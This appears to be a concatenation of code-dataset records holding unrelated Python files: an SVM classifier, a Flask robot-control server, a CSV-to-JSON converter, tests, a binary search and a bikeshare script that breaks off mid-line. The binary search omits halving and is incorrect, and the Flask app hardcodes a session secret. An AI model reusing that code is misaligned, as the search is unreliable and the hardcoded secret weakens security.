)\n","sub_path":"anchore_engine/services/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":26223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"418472665","text":"from sklearn import svm,metrics\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\n\ndef unpickle(filename):\n import pickle\n with open(filename, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\nNUM_BATCH = 1\n\nif __name__ == \"__main__\":\n train_data = []\n test_data = unpickle(\"cifar-10-batches-py/test_batch\")\n for i in range(NUM_BATCH):\n filename = \"cifar-10-batches-py/data_batch_\"+str(i+1)\n train_data.append(unpickle(filename))\n\n train_i = train_data[0][b'data']\n train_l = train_data[0][b'labels']\n test_i = test_data[b'data']\n test_l = test_data[b'labels']\n\n # train_i = train_i.reshape(10000, 3, 32, 32)\n # train_i = train_i.transpose([0, 2, 3, 1])\n\n # train_l = np.array(train_l)\n # train_l = np.identity(10)[train_l]\n\n train_i = train_i[:5000]/256\n train_l = np.array(train_l[:5000])\n test_i = test_i[:1000]/256\n test_l = np.array(test_l[:1000])\n\n clf = svm.SVC()\n clf.fit(train_i, train_l)\n pre = clf.predict(test_i)\n print(\"---accuracy---\")\n print(metrics.accuracy_score(test_l, pre))\n print(\"Confusion matrix\")\n print(metrics.confusion_matrix(test_l, pre,labels=[0,1,2,3,4,5,6,7,8,9]))\n","sub_path":"cifar_svm.py","file_name":"cifar_svm.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"640844397","text":"import os\nimport path_helper_main_ml\nfrom classifier import initialize_classifier, classify_image\nfrom flask import Flask, render_template, url_for, redirect, request, session\nimport requests\n\ngraph, label = initialize_classifier()\nREMOTE_API_PORT = \"5000\"\nHOST_PORT = \"8000\"\n\napp = Flask(__name__)\napp.secret_key = 'SUPER SECRET KEY'\n\n# USER ROUTES\n@app.route('/')\ndef welcome_page():\n return render_template('index.html')\n\n@app.route('/set_ip_address')\ndef set_ip_address():\n session['ip'] = 'http://' + request.args['ip'] + ':' + REMOTE_API_PORT\n session['host_ip'] = 'http://' + request.args['host_ip'] + ':' + HOST_PORT\n return redirect('/rc')\n\n@app.route('/given_ip')\ndef select_mode_page():\n return render_template('given_ip.html')\n\n@app.route('/rc')\ndef user_driven():\n html_return = requests.get(session['ip']).text\n image_url = session['ip'] + html_return.split(\"img src=\")[1].split('><')[0]\n return render_template('rc.html',image_url=image_url)\n\n@app.route('/route_left')\ndef get_move_left():\n left_command = requests.get(session['ip'] + '/piv_left')\n print(left_command)\n return redirect('/rc')\n\n@app.route('/route_forward')\ndef get_move_forward():\n forward_command = requests.get(session['ip'] + '/forward')\n return redirect('/rc')\n\n@app.route('/route_right')\ndef get_move_right():\n right_command = requests.get(session['ip'] + '/piv_right')\n return redirect('/rc')\n\n# API ROUTES\n@app.route('/upload', methods=['POST'])\ndef upload_file():\n file = request.files['image']\n savepath = os.path.join(\"./current_image\", file.filename)\n file.save(savepath)\n move = classify_image(savepath, graph, label)[0][0]\n os.remove(savepath)\n return move\n\n@app.route('/ai_move')\ndef ai_move():\n requests.get(session['ip'] + '/ai_move?host_url=' + session['host_ip'] + '/upload')\n return redirect('/rc')\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8000)\n","sub_path":"snailMLserver.py","file_name":"snailMLserver.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"571291674","text":"#!/usr/bin/env python\r\n#-*- coding: utf-8 -*-\r\n\r\n'''\r\n Author : Jaekyu Lee, github : https://github.com/JaekyuLee\r\n https://github.com/ChulseoungChae\r\n https://github.com/KimHyeongGoo\r\n https://github.com/jeonghoonkang\r\n'''\r\n\r\nfrom __future__ import print_function\r\n#import requests\r\nimport time\r\nimport json\r\nfrom collections import OrderedDict\r\nimport pandas as pd\r\nimport sys\r\nimport os\r\nimport argparse\r\nimport shutil\r\nimport copy\r\nfrom datetime import datetime\r\n\r\nimport pcs\r\n#출력 디렉토리 이름을 output으로 변경\r\n# Result, changed JSON 등 , output 디렉토리 하부에 저장\r\n# write 관련 함수는 모듈을 따로 파일로 만들면 좋을것같음\r\n\r\nARG= 50 #argment\r\n\r\ndef dprint(s): # debug_print\r\n global g_DEBUG\r\n if (g_DEBUG):\r\n print (' ', s)\r\n else : return None\r\n\r\ndef brush_argparse():\r\n\r\n global g_DEBUG # dprint 함수 실행을 위한 플래그\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-debug\", help=\"debug mode run\", action=\"store_true\")\r\n parser.add_argument(\"-jsonpack\", help=\"how many json's in one output file\", type=int)\r\n parser.add_argument(\"-filetype\", help=\"csv or xlsx\")\r\n parser.add_argument(\"-filekind\", help=\"select file type number you'll store\")\r\n parser.add_argument(\"-field\", help=\"select field idx you'll store\")\r\n parser.add_argument(\"-ts\", help=\"select timestamp field idx you'll store\")\r\n parser.add_argument(\"-carid\", help=\"select carid field idx you'll store\")\r\n parser.add_argument(\"-metric\", help=\"select metric you'll store\")\r\n parser.add_argument(\"-outdir\", help=\"select outdir\", type=str, default='./output')\r\n parser.add_argument(\"-pn\", help=\"select producer num\", default='4')\r\n parser.add_argument(\"-cn\", help=\"select consumer num\", default='2')\r\n \r\n args = parser.parse_args()\r\n \r\n if (args.debug) : \r\n g_DEBUG = True\r\n dprint ('DPRINT Enabled ************************************** ' + __file__ )\r\n \r\n return args\r\n\r\ndef make_result_dirctory_tree(_savepath, filepath, _carid):\r\n _savepath = _savepath+\"/resultData\"\r\n if not(os.path.isdir(_savepath)):\r\n os.makedirs(os.path.join(_savepath))\r\n filepath = filepath.split('originalCSVData')[-1]\r\n if filepath[0] == '/':\r\n filepath = filepath[1:]\r\n filepath = filepath.split('/')[0:-1]\r\n for sub in filepath:\r\n _savepath = _savepath + '/' + sub\r\n if not(os.path.isdir(_savepath)):\r\n os.makedirs(os.path.join(_savepath))\r\n if _savepath[-1] == '/':\r\n _savepath = _savepath[0:-1]\r\n _savepath = _savepath + '/' + _carid\r\n if not(os.path.isdir(_savepath)):\r\n os.makedirs(os.path.join(_savepath))\r\n return _savepath \r\n \r\n# make a file\r\ndef writeJson(_buffer, _json_title):\r\n with open(_json_title+'.json', 'a') as f:\r\n json.dump(_buffer, f, ensure_ascii=False, indent=4)\r\n\r\n# create folder & make files\r\ndef writeJsonfiles(_buffer, _json_title, _num, _fname, _carid, _outdir):\r\n #try:\r\n savepath = os.path.dirname(os.path.realpath(__file__))\r\n savepath = savepath + _outdir[1:] \r\n _indx = savepath.find('//')\r\n if _indx != -1:\r\n savepath = savepath[:_indx+1] + savepath[_indx+2:] \r\n if not(os.path.isdir(savepath)):\r\n os.makedirs(os.path.join(savepath))\r\n #print ('-->',savepath)\r\n savepath = make_result_dirctory_tree(savepath, _fname, _carid)\r\n # Unicode decode error가 발생하여 수정해줌\r\n with open(str(savepath + '/' +_json_title+'_'+str(_num)+'.json'), 'w') as f:\r\n try:\r\n json.dump(_buffer, f, ensure_ascii=False, indent=4)\r\n # 몇몇 파일에서 ascii관련 DecodeError 발생\r\n except:\r\n json.dump(_buffer, f, ensure_ascii=True, indent=4)\r\n print ('[' + _json_title + '_'+str(_num)+'.json] saved')\r\n \r\n\r\n# convert Time to Epoch\r\ndef convertTimeToEpoch(_time):\r\n date_time = \"%s.%s.%s %s:%s:%s\" %(_time[8:10], _time[5:7], _time[:4], _time[11:13], _time[14:16], _time[17:])\r\n pattern = \"%d.%m.%Y %H:%M:%S\"\r\n epoch = int (time.mktime(time.strptime(date_time, pattern)))\r\n return epoch\r\n\r\n# YYYYmmddHHMMSS -> dd.mm.YY HH:MM:SS\r\ndef convertTimeToEpoch_v2(_time):\r\n date_time = \"%s.%s.%s %s:%s:%s\" %(_time[6:8], _time[4:6], _time[:4], _time[8:10], _time[10:12], _time[12:])\r\n pattern = \"%d.%m.%Y %H:%M:%S\"\r\n epoch = int (time.mktime(time.strptime(date_time, pattern)))\r\n return epoch\r\n\r\n# display progress bar\r\ndef printProgressBar(iteration, total, prefix = u'처리중', suffix = u'완료',\\\r\n decimals = 1, length = 60, fill = '█'): \r\n # 작업의 진행상황을 표시\r\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\r\n filledLength = int(length * iteration // total)\r\n bar = fill * filledLength + '-' * (length - filledLength)\r\n print('\\r%s |%s| %s%% %s' %(prefix, bar, percent, suffix), end='\\r')\r\n sys.stdout.flush()\r\n if iteration == total:\r\n None\r\n #print()\r\n\r\n# 파일로 저장하기전 데이터의 정보를 요약해주는 _dataInfo를 만들어줌\r\ndef initDataInfo(_dataInfo, __list):\r\n _dataInfo[\"1.metric\"]= __list[0][\"metric\"]\r\n vallist = [d[\"value\"] for d in __list]\r\n tslist = [int(d[\"timestamp\"]) for d in __list]\r\n _dataInfo[\"2.mints\"]=min(tslist)\r\n _dataInfo[\"3.maxts\"]=max(tslist)\r\n _dataInfo[\"4.mindt\"]=str(datetime.fromtimestamp(_dataInfo[\"2.mints\"]))\r\n _dataInfo[\"5.maxdt\"]=str(datetime.fromtimestamp(_dataInfo[\"3.maxts\"]))\r\n _dataInfo[\"6.totalCnt\"]=len(__list)\r\n _dataInfo[\"7.minval\"]=min(vallist)\r\n _dataInfo[\"8.maxval\"]=max(vallist)\r\n _dataInfo[\"9.tags\"]=__list[0][\"tags\"]\r\n \r\n\r\ndef ToJsonFormat(_list, _args_pack_, _json_title, _filename):\r\n \r\n _list = _list.sort_values(by=[_args_pack_.ts.decode('utf-8')], axis=0)\r\n\r\n Car_id = str(_list[_args_pack_.carid.decode('utf-8')].iloc[0]) \r\n dftime = _list[_args_pack_.ts.decode('utf-8')].tolist()\r\n dfval = _list[_args_pack_.field.decode('utf-8')].tolist()\r\n \r\n data_len = len(_list)\r\n _buffer = []\r\n count=0\r\n perCount=0\r\n num=0 #\r\n \r\n for i in range(len(dftime)):\r\n perCount += 1\r\n \r\n value = dfval[i]\r\n \r\n # skip NaN value & ts\r\n if value == 'nan' or dftime[i] == 'nan':\r\n continue\r\n elif value == 'NaN' or dftime[i] == 'NaN':\r\n continue\r\n \r\n ts = convertTimeToEpoch(dftime[i])\r\n ts = str(ts)\r\n \r\n csv_data = dict()\r\n csv_data['metric'] = _args_pack_.metric\r\n csv_data[\"tags\"] = dict()\r\n\r\n csv_data['timestamp'] = ts\r\n csv_data[\"value\"] = value\r\n \r\n csv_data[\"tags\"]['VEHICLE_NUM'] = str(Car_id)\r\n csv_data[\"tags\"][\"fieldname\"] = _args_pack_.field\r\n\r\n count += 1\r\n _buffer.append(csv_data)\r\n \r\n if count >= _args_pack_.jsonpack:\r\n dataInfo={}\r\n initDataInfo(dataInfo, _buffer)\r\n dataInfo = OrderedDict(sorted(dataInfo.items(), key=lambda t: t[0]))\r\n _buffer.insert(0, dataInfo)\r\n num +=1\r\n writeJsonfiles(_buffer, _json_title, num, _filename, Car_id, _args_pack_.outdir) #save files by bundle\r\n _buffer = []\r\n count = 0\r\n\r\n #printProgressBar(perCount, data_len)\r\n\r\n if len(_buffer) != 0:\r\n # 버퍼에 남은 데이터 json 파일 생성\r\n #writeJson(_buffer, _json_title)# make a file\r\n dataInfo={}\r\n initDataInfo(dataInfo, _buffer)\r\n dataInfo = OrderedDict(sorted(dataInfo.items(), key=lambda t: t[0]))\r\n _buffer.insert(0, dataInfo)\r\n num +=1\r\n writeJsonfiles(_buffer, _json_title, num, _filename, Car_id, _args_pack_.outdir) #save files by bundle\r\n\r\ndef field_IndextoStr(_fieldnum, _collist):\r\n return _collist[_fieldnum]\r\n\r\ndef ts_IndextoStr(_tsnum, _collist):\r\n return _collist[_tsnum]\r\n\r\ndef carid_IndextoStr(_caridnum, _collist):\r\n return _collist[_caridnum]\r\n\r\ndef CSVtoDF(_filename, _args_pack_, fieldidx, tsidx, carididx):\r\n print(\"\\nreading %s\" %_filename)\r\n if _args_pack_.filetype == 'xlsx' :\r\n df = pd.read_excel(_filename)\r\n elif _args_pack_.filetype == 'csv' :\r\n try:\r\n chunks = pd.read_csv(_filename, usecols = [fieldidx, tsidx, carididx] ,low_memory=False, chunksize=10000, encoding='utf-8')\r\n except UnicodeDecodeError:\r\n try:\r\n chunks = pd.read_csv(_filename,usecols = [fieldidx, tsidx, carididx], low_memory=False, chunksize=10000, encoding='euc-kr') \r\n except UnicodeDecodeError:\r\n chunks = pd.read_csv(_filename, usecols = [fieldidx, tsidx, carididx], low_memory=False, chunksize=10000, encoding='cp949')\r\n \r\n df = pd.concat(chunks, ignore_index=True)\r\n #print(df.columns)\r\n\r\n \r\n if _args_pack_.filetype == 'xlsx' :\r\n jsonTitle = (_filename.split('/'))[-1][:-5]+'_'+_args_pack_.field\r\n elif _args_pack_.filetype == 'csv' :\r\n jsonTitle = (_filename.split('/'))[-1][:-4]+'_'+_args_pack_.field\r\n \r\n print(\"%s -> DF\" %_filename)\r\n\r\n return df, jsonTitle\r\n\r\ndef pack_to_meta(pack):\r\n ret = {}\r\n ret['field']=pack.field\r\n ret['timestamp']=pack.ts\r\n ret['carid']=pack.carid\r\n ret['metric']=pack.metric\r\n ret['pn']=pack.pn\r\n ret['cn']=pack.cn\r\n ret['field']=pack.field\r\n ret['bundle']=pack.jsonpack\r\n ret['outdir']=pack.outdir\r\n return ret\r\n\r\nif __name__ == \"__main__\":\r\n \r\n global g_DEBUG\r\n g_DEBUG = False\r\n\r\n #gFile_type, bundle = brush_args()\r\n _args_pack_ = brush_argparse()\r\n _args_pack_.pn = int(_args_pack_.pn)\r\n _args_pack_.cn = int(_args_pack_.cn)\r\n dprint (vars(_args_pack_))\r\n \r\n import type_file\r\n file_type = type_file.file_type\r\n file_list = file_type['type_'+_args_pack_.filekind]['files']\r\n col_list = file_type['type_'+_args_pack_.filekind]['columns']\r\n file_list = [i.encode('utf-8') for i in file_list] #unicode형태(u' ~ ')를 일반 string으로 바꿔줌\r\n col_list = [i.encode('utf-8') for i in col_list]\r\n\r\n fieldidx = int(_args_pack_.field)\r\n tsidx = int(_args_pack_.ts)\r\n carididx = int(_args_pack_.carid)\r\n # 입력한 index 정보를 실제 string으로 전환\r\n _args_pack_.field = field_IndextoStr(fieldidx, col_list)\r\n _args_pack_.ts = ts_IndextoStr(tsidx, col_list)\r\n _args_pack_.carid = carid_IndextoStr(carididx, col_list)\r\n #print(_args_pack_.field)\r\n print('변환 파일 목록')\r\n for f in file_list:\r\n print(f)\r\n\r\n np = _args_pack_.pn\r\n nc = _args_pack_.cn\r\n\r\n meta = pack_to_meta(_args_pack_)\r\n # 서브 프로세스 관리자, 생산자, 소비자 생성\r\n workers = pcs.Workers(np, nc)\r\n works_basket_list = workers.start_work(meta)\r\n\r\n for file_name in file_list:\r\n # csv -> df\r\n df, title = CSVtoDF(file_name, _args_pack_, fieldidx, tsidx, carididx)\r\n if len(df) == 0:\r\n continue\r\n # df의 크기가 np보다 작으면 main process에서 처리\r\n if len(df) < np:\r\n ToJsonFormat(df, _args_pack_, title, file_name)\r\n # df를 np만큼 분할하여 각 생산자에게 큐로 전송\r\n else :\r\n start=0\r\n end=start+len(df)/np\r\n for idx in range(np):\r\n if idx == np-1:\r\n end = len(df)\r\n while (works_basket_list[idx].full()):\r\n time.sleep(0.5)\r\n works_basket_list[idx].put([df[start:end], title, file_name])\r\n start = end\r\n end = start+len(df)/np\r\n print(\"\\nmain : [csv -> df] done\")\r\n print(\"work basket의 모든 data 전송 완료\")\r\n print(\"subprocess가 아직 실행 중 입니다...\\n\")\r\n\r\n lines = workers.report()\r\n totallines=0\r\n for line in lines:\r\n totallines += line\r\n print(\"total processed lines : %d\" %totallines)\r\n","sub_path":"CSV2JSON/CSVJSON_main.py","file_name":"CSVJSON_main.py","file_ext":"py","file_size_in_byte":12040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"589204485","text":"import json\nimport os\n\nfrom utils.baseview import BaseView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom sizer.local_settings import BASE_DIR\n\nclass GetHelpDetails(BaseView):\n\n def get(self, format=None):\n \"\"\"\n To get help page\n \"\"\"\n data = self.get_video_details()\n\n if not data:\n return Response({'status': 'error',\n 'errorMessage': 'Training videos are missing from webapps/dist/videos folder.'},\n status=status.HTTP_400_BAD_REQUEST)\n\n return Response(data)\n\n def get_video_details(self):\n\n response_data = list()\n\n video_path = os.path.join(BASE_DIR, \"webapps/dist/videos/\")\n if not os.path.isdir(video_path):\n return response_data\n\n video_info_path = os.path.join(BASE_DIR, \"webapps/dist/videos/videos.info\")\n if not os.path.exists(video_info_path):\n return response_data\n\n file_list = [line.rstrip('\\n') for line in open(video_info_path)]\n\n for ifile in file_list:\n ipath = \"webapps/dist/videos/\" + ifile\n fipath = os.path.join(BASE_DIR, ipath)\n if not os.path.exists(fipath):\n continue\n\n with open(fipath, 'r', encoding='utf-8') as f_file:\n info_data=f_file.read()\n info = json.loads(info_data)\n response_data.append(info)\n\n return response_data\n","sub_path":"hyperflexsizer-NewVersions/sizer/sizer/help/helppage.py","file_name":"helppage.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"323544809","text":"import pytest\nfrom dozer.base import PagedResultSet\n\n\n@pytest.fixture\ndef result_set():\n return PagedResultSet(GOOD_RESULT_STRUCT)\n\nGOOD_RESULT_STRUCT = {\n '_items': 'a.b.c.d.e.f.g.h.i.j'.split('.'),\n '_meta': {\n 'max_results': 10,\n 'page': 1,\n 'total': 10\n },\n '_links': {\n 'last': 'last_url'\n }\n}\n\nRS_MISSING_ITEMS = {\n '_meta': {\n 'max_results': 10,\n 'page': 1,\n 'total': 20\n },\n '_links': {\n 'next': 'next_url',\n 'last': 'last_url'\n }\n}\n\nRS_MISSING_META = {\n '_items': [],\n '_links': {\n 'next': 'next_url',\n 'last': 'last_url'\n }\n}\n\nRS_MISSING_LINKS = {\n '_items': [], '_meta': {\n 'max_results': 10,\n 'page': 1,\n 'total': 10\n },\n}\n\nRS_FIRST_PAGE = {\n '_items': 'a.b.c.d.e.f.g.h.i.j'.split('.'),\n '_meta': {\n 'max_results': 10,\n 'page': 1,\n 'total': 20\n },\n '_links': {\n 'next': 'next_url',\n 'last': 'last_url'\n }\n}\n\nRS_NEXT_PAGE = {\n '_items': 'k.l.m.n.o.p.q.r.s.t'.split('.'),\n '_meta': {\n 'max_results': 10,\n 'page': 1,\n 'total': 10\n },\n '_links': {\n 'last': 'last_url'\n }\n}\n\n\ndef test_paged_result_init():\n PagedResultSet(GOOD_RESULT_STRUCT)\n\n with pytest.raises(NameError) as e:\n PagedResultSet(RS_MISSING_ITEMS)\n assert '_items' in str(e.value), \"_items should be in the error message\"\n\n with pytest.raises(NameError) as e:\n PagedResultSet(RS_MISSING_META)\n assert '_meta' in str(e.value), \"_meta should be in the error message\"\n\n with pytest.raises(NameError) as e:\n PagedResultSet(RS_MISSING_LINKS)\n assert '_links' in str(e.value), \"_links should be in the error message\"\n\n\ndef test_collection_length(result_set):\n # p = PagedResultSet(GOOD_RESULT_STRUCT)\n p = result_set\n assert len(p) == GOOD_RESULT_STRUCT['_meta']['total'],\\\n \"Length should be {}\".format(GOOD_RESULT_STRUCT['_meta']['_total'])\n\n\ndef test_index_access():\n p = PagedResultSet(GOOD_RESULT_STRUCT)\n\n assert p[0] == 'a', 'First element should be \"a\"'\n assert p[2] == 'c', 'Third element should be \"c\"'\n\n\ndef test_set_is_readonly():\n p = PagedResultSet(GOOD_RESULT_STRUCT)\n\n with pytest.raises(NotImplementedError):\n p[0] = 'foo'\n\n\ndef test_iteration():\n p = PagedResultSet(GOOD_RESULT_STRUCT)\n\n count = 0\n for x in p:\n assert x == GOOD_RESULT_STRUCT['_items'][count]\n count += 1\n\n\ndef test_paging(monkeypatch):\n class FakeResp(object):\n json = RS_NEXT_PAGE\n\n def fake_request(*args, **kwargs):\n return FakeResp()\n\n monkeypatch.setattr('requests.sessions.Session.request', fake_request)\n p = PagedResultSet(RS_FIRST_PAGE)\n assert len(p.loaded_data) == 1, \"Should initialize only the first page\"\n p._get_next()\n assert len(p.loaded_data) == 2, \"after next, there should be one more page\"\n","sub_path":"dozer/tests/test_paged_result.py","file_name":"test_paged_result.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"259667587","text":"import time\nimport datetime\n\nfrom bson import objectid\nfrom factories.base import Factory\nfrom models.day import Day\n\nconnection = Factory.connection\nconnection.register([Day])\n\n\nclass DayFactory(Factory):\n model = 'Day'\n\n @staticmethod\n def get_range(user_id, from_ts, to_ts):\n query = {\n 'user_id': objectid.ObjectId(user_id),\n 'date_ts': {'$gte': int(from_ts), '$lte': int(to_ts)}\n }\n\n days = connection.Day.find(query)\n\n return list(days)\n\n @staticmethod\n def get_week(user_id):\n today = datetime.date.today()\n yesterday = datetime.date.fromordinal(today.toordinal()-1)\n seven_days_ago = datetime.date.fromordinal(today.toordinal()-7)\n\n from_ts = time.mktime(seven_days_ago.timetuple())\n to_ts = time.mktime(yesterday.timetuple())\n\n return DayFactory.get_range(user_id, from_ts, to_ts)\n","sub_path":"factories/day.py","file_name":"day.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"487573809","text":"def BinarySearch(arr,key):\n high = len(arr) - 1\n low = 0\n middle= 0\n \n while low <= high: \n \n middle = (high + low) \n if arr[middle] < key: \n low = middle + 1\n elif arr[middle] > key: \n high = middle - 1\n else: \n return middle\n return -1\nprint(BinarySearch([4,8,15,16,23,42],15))","sub_path":"data_structures_and_algorithms_python/challenges/BinarySearch/array_binary_search.py","file_name":"array_binary_search.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"300317659","text":"\"\"\"\n@author: Vincent Bonnet\n@description : Render Skinning\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.collections import LineCollection\nfrom matplotlib import colors as mcolors\n\ndef draw(mesh, skeleton, weights, displacement, frame_id, render_folder_path = \"\"):\n '''\n Drawing function to display the mesh and skeleton\n '''\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.axis('equal')\n ax.set_xlim(-16, 16)\n ax.set_ylim(-16, 16)\n plt.title('Linear Skinning')\n\n colors_template = np.asarray([mcolors.to_rgba(c)\n for c in plt.rcParams['axes.prop_cycle'].by_key()['color']])\n\n # Draw mesh (points and edges)\n x, y = zip(*mesh.vertices)\n point_colors = np.ones((len(mesh.vertices), 4))\n\n num_vertices = len(mesh.vertices)\n num_influences = weights.shape[1]\n for vertex_id in range(num_vertices):\n point_color = np.zeros(3)\n\n for influence_id in range(num_influences):\n weight = weights[vertex_id, influence_id]\n point_color += colors_template[influence_id][0:3] * weight\n\n point_colors[vertex_id][0:3] = point_color\n\n ax.scatter(x, y, color=point_colors, s=3.0)\n\n segments = mesh.get_boundary_segments()\n line_segments = LineCollection(segments,\n linewidths=1.0,\n colors='orange',\n linestyles='-',\n alpha=1.0)\n ax.add_collection(line_segments)\n\n # Draw displacement\n if displacement is not None:\n segments = []\n for vertex_id, vertex in enumerate(mesh.vertices):\n segments.append([vertex, vertex+displacement[vertex_id]])\n\n line_segments = LineCollection(segments,\n linewidths=1.0,\n colors='green',\n linestyles='-',\n alpha=1.0)\n\n ax.add_collection(line_segments)\n\n\n\n # Draw skeleton\n segments = skeleton.get_bone_segments()\n line_segments = LineCollection(segments,\n linewidths=3.0,\n colors=colors_template,\n linestyles='-',\n alpha=1.0)\n\n ax.add_collection(line_segments)\n plt.show()\n\n # Export figure into a png file\n if len(render_folder_path) > 0:\n filename = str(frame_id).zfill(4) + \" .png\"\n fig.savefig(render_folder_path + \"/\" + filename)\n","sub_path":"skinning/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"276206683","text":"import time\nimport pandas as pd\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # TO DO: get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n city = input('Enter any one of the following cities (Chicago, New York City, Washington): ').lower()\n while city != 'chicago' and city != 'new york city' and city != 'washington':\n city = input('Enter any one of the following cities (Chicago, New York City, Washington): ').lower()\n\n # TO DO: get user input for month (all, january, february, ... , june)\n month = input('Enter which month you want to filter by (January, February, ... , June, or all): ').lower()\n while month != 'january' and month != 'february' and month != 'march' and month != 'april' and month != 'may' and month != 'june' and month != 'all':\n month = input('Enter which month you want to filter by (January, February, ... , June, or all): ').lower()\n\n # TO DO: get user input for day of week (all, monday, tuesday, ... sunday)\n day = input('Enter which day you want to filter by (Monday, Tuesday, ... , Sunday, or all): ').lower()\n while day != 'monday' and day != 'tuesday' and day != 'wednesday' and day != 'thursday' and day != 'friday' and day != 'saturday' and day != 'sunday' and day!= 'all':\n day = input('Enter which day you want to filter by (Monday, Tuesday, ... , Sunday, or all): ').lower()\n\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n \n # *** SOURCE FOR THE CODE IN THIS FUNCTION: Based on the Practice Problems (No. 3) earlier in the lesson for this project ***\n # Load data into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n \n # Convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n \n # Extract the month and day of the week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.day_name()\n \n # Filter the month if applicable\n if month != 'all':\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1\n # Filter the month to create a new dataframe\n df = df[df['month'] == month]\n \n # Filter the day if applicable\n if day != 'all':\n df = df[df['day_of_week'] == day.title()]\n \n return df\n\ndef start_the_clock():\n # created a function that will calculate the time it takes to calculate\n start_time = time.time()\n rounded_time = round((time.time() - start_time), 1)\n return rounded_time\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # *** SOURCE FOR THE CODE IN THIS FUNCTION: Based on the Practice Problems (No. 1) earlier in the lesson for this project ***\n \n # TO DO: display the most common month\n # Convert the Start Time to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n # Extract month from the Start Time column to create a month column\n df['month'] = df['Start Time'].dt.month\n # Find the most common month\n popular_month = df['month'].mode()[0]\n print('Most common month: {}'.format(popular_month))\n\n # TO DO: display the most common day of week\n # Convert the Start Time to datetime -- already done above\n # Extract day from the Start Time column to create a day column\n df['day_of_week'] = df['Start Time'].dt.day_name()\n # Find the most common day\n popular_day = df['day_of_week'].mode()[0]\n print('Most common day: {}'.format(popular_day))\n\n # TO DO: display the most common start hour\n # Convert the Start Time to datetime -- already done above\n # Extract hour from the Start Time column to create an hour column\n df['hour'] = df['Start Time'].dt.hour\n # Find the most common start hour\n popular_hour = df['hour'].mode()[0]\n print('Most common start hour: {}'.format(popular_hour))\n\n print(\"\\nThis took %s seconds.\" % start_the_clock())\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # TO DO: display most commonly used start station\n popular_start_station = df['Start Station'].mode()[0]\n print('Most common start station: {}'.format(popular_start_station))\n\n # TO DO: display most commonly used end station\n popular_end_station = df['End Station'].mode()[0]\n print('Most common end station: {}'.format(popular_end_station))\n\n # *** SOURCE FOR THE CODE IN THIS FUNCTION: https://stackoverflow.com/questions/53037698/how-can-i-find-the-most-frequent-two-column-combination-in-a-dataframe-in-python (BENY; October 29, 2018) ***\n # TO DO: display most frequent combination of start station and end station trip\n combo_stations = df.groupby(['Start Station','End Station']).size().idxmax()\n print('Most common combination of start station and end station: {}'.format(combo_stations))\n\n print(\"\\nThis took %s seconds.\" % start_the_clock())\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # TO DO: display total travel time\n total_travel_time = df['Trip Duration'].sum()\n print('The total travel time: {}'.format(round(total_travel_time, 1)))\n\n # TO DO: display mean travel time\n mean_travel_time = df['Trip Duration'].mean()\n print('The average travel time: {}'.format(round(mean_travel_time, 1)))\n\n print(\"\\nThis took %s seconds.\" % start_the_clock())\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # TO DO: Display counts of user types\n user_types = df['User 